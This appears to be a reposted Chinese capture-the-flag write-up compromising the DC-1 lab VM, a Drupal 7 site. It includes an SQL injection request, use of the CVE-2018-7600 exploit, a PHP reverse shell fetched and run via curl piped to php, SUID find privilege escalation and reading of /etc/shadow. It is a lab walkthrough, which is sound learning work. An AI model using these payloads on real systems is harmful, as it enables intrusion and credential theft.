DC-1靶机学习

1.日常nmap扫一下

root@kali:~# nmap -sP -PI 192.168.43.0/24 -T4

root@kali:~# nmap -A -p- 192.168.43.61


可以看到是Drupal 7
这个熟悉的界面

在Drupal7是有sql注入漏洞的

2.用burpsuite抓包,改包

POST /node?destination=node HTTP/1.1
Host: 192.168.43.61
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4078.2 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.61/node?destination=node
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.43.61
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a


可以看到爆出来的数据
然后转发到sqlmap

由于sqlmap跑不出数据,所以手工吧,害

似乎不是跑不出数据,而是被ban ip了,哦豁,当场去世,恢复快照2333
依旧sqlmap一把梭子

emmm,似乎是drupal 7的特定hash。。。所以还是爆破吧
用hashcat爆破了几个字典,无事发生。。。

3.metasploit


挨个试了下,似乎有个RCE,2333

漏洞出处好像是CVE-2018-7600
这就拿到一个webshell

flag1到手
提示是读取配置文件,于是到网站目录下找找,find命令用不了。。。手动翻吧
翻到一个settings.php,里面是数据库的连接密码,还有个flag2提示,暴力破解不是唯一的方法

好像和之前sql注入拿到的东西(账号密码,只是加密过的)有点相关联,2333,真就没爆破出来。。。

头裂,meterprter输入shell没效果。。。。wdnmd
干脆直接找利用脚本,github找找看
https://github.com/pimps/CVE-2018-7600
这个可以用,但是我要一个交互的shell
本地启用一个端口进行监听8080

nc -lvvp 8080

再将

<?php
$sock=fsockopen("192.168.43.41",8080);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

保存为shell.txt
并在本地用python开一个web服务

 python3 -m http.server --bind 0.0.0.0 8088

执行CVE-2018-7600进行反弹一个·shell

python3 drupa7-CVE-2018-7600.py  -c "curl http://192.168.43.41:8088/shell.txt|php" http://192.168.43.61


查看监听端口

收到了shell
然后破解密码
参考https://www.cnblogs.com/mafeifan/p/4909631.html

php ./scripts/password-hash.sh $S$D46MHlUS6aNeoQ1xqUqI2N5Q3O5tUO8JnpY4D014Lr.xS93qRcqW $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

然而

WTF???

4.换个思路

上一步已经拿到了数据库账号密码
或许可以直接修改密码

这就很迷。。。。
算了继续攻坚战,提权试试看
提权指导:https://www.cnblogs.com/zaqzzz/p/12075132.html

find / -user root -perm -4000 -print 2>/dev/null

发现find命令可以提权

基本就是这样,利用root权限看一下shadow
很意外的发现flag4

然后又在root家目录发现flag4.txt

find abcd -exec cat /home/flag4/flag4.txt ;

5.最后的flag

根据find提权,基本情况就是这样,想干啥干啥,
那么砸门来点狠的,哈哈哈哈

find abcd -exec find / -name *flag* ;


就在根目录下

find abcd -exec cat /root/thefinalflag.txt ;

so,通关成功,脸上笑嘻嘻(心里mmp)
最后的话:
后面又拿shadow的密码爆破了下

flag4:orange
这个账户,2333333

真有意思

原文地址:https://www.cnblogs.com/mke2fs/p/12874748.html